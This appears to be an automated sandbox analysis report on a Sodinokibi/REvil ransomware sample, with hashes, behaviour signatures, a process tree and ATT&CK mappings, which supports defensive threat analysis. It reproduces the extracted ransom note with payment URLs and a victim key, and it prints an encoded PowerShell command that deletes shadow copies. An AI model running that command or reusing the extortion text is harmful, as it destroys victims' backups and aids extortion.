Analysis

  • max time kernel
    145s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    01-07-2022 02:51

General

  • Target

    sample.exe

  • Size

    165KB

  • MD5

    46357f434f7a6af45d039812360c5fb4

  • SHA1

    413637aa0d885aa3f35aef237d04c549d74b1d89

  • SHA256

    23d96b2a01d190a2146849c6cfe59fea9f3c6c6a8f71367dacaf89d3fa1ac51c

  • SHA512

    b48c571d0bc28eae58426eebee334baa49a78eb6f19a2efc31997233cd97caa914356657980222e0acf9eb982b45978ab103168c11f5a5964edce628816b3089

Score
10/10

Malware Config

Extracted

Path

C:\cvy8251-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension cvy8251. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F11F770EFF12251C 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F11F770EFF12251C Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: h5LEebGua9ZkFNPF2K+OS7l9E+MRYZR+z3kyaR/KHanvImrboxAUrQgTm7QXYHLt Lb7R0UgCxeQ5wjHpzHbvTAw374F4ARxhck+PHsJTEM38Gkf+LxGXkK6Hp2hsQ3ed nF4Px+gcMtOUzSs6rx46FvosPkBLnoQlLsT6oOH+GtHgmSyHZvFW7Ie/xKog8wSS w+55E7FzFkhZPVg8T+I4MGY7q6Sj+/03w/eVvCeqxZpYzmSn1C3EFFT/XDYbRPV6 0RFTdA0e+Cs9BZJWyJNU5RFaxF6hpm5evN1KRbYibScVj+3MRFj8Ap7IotICtGCv a2xA3+Hb2jTDSCVhDVvAJ3lwn7Dn03C+5xmrlr2i4KGMBxeQjYlKj31KNqhjqUGW K6LJKpEcQb1dkkGV98dBUGtQa7Srzq9ByqcrDu1/Z/4X4V1jqCbnIen1QPHcjTEt kv0QXjPjal+b86kcI4sHpG3J/RWY3/HSkJBdgdguRqmrxwk4SUkYEygYCK0JDZe6 CbQtuLihlcGAjVWZYBD5Z4VMxgToA2nzPkjEVli5gbHG+DZ5bG1FzRyA/9/L7vIn v+jKWNynoIJ62TL5D2290rAQ+4iJxulaHqZnmxpIpmH2BQe9ICa+3CJa6Jrt96Qd bSSA5QG2Xk/QZ/OMQ3JnxP5GZDLDb2yiVJK6tzrXlb1kFRVP1TNCp08RI5zWXROT +H+ScECdXADVsZLA3sr6zbu81U39Z8OOF2IOjogUHBXQUdN5dYZXA/cMOaUo7zKD oS13YvegfyknFB9DCrMEIZZ+ao9TzSl1QtD3e1PqluWeanFmUMUvp8/Iv1k8vOGI qV3/fOQBd7XvkumM4vLdXXsqEtkVwrYBVbhlcZjdb5VCfn3iRYZo6hicSeRFQaSb zW4VLPSETcJ6X01mcfbwnaQWQlqqU0fp8g5mJwM1fgSfEikK2DLIQlylmKGnQBsC qJGeyZ37Jtv9Y3E8wGhpOGvVVT2I3sWQc88I2eUVHRiY8tek6jJ9ehibuGAiiUcH atP66wna4hq8sh7yd33hiGmiKiGGETpKzbIBvLMt5M2DAcZW7yfkyD3wU+RcuaxD zXvzWpS4k5iTIf9YjkJ4erL3HcrLvRv4mRyf9NvJvbnqfOBPON2iKR2xEhuZKJC9 NPXoT7e14Cnq3IwU ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F11F770EFF12251C

http://decryptor.cc/F11F770EFF12251C

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sample.exe
    "C:\Users\Admin\AppData\Local\Temp\sample.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4712
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4688
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3044
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3836

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4688-130-0x0000000000000000-mapping.dmp
    • memory/4688-131-0x0000024AB86B0000-0x0000024AB86D2000-memory.dmp
      Filesize

      136KB

    • memory/4688-132-0x00007FFA86690000-0x00007FFA87151000-memory.dmp
      Filesize

      10.8MB

    • memory/4688-133-0x00007FFA86690000-0x00007FFA87151000-memory.dmp
      Filesize

      10.8MB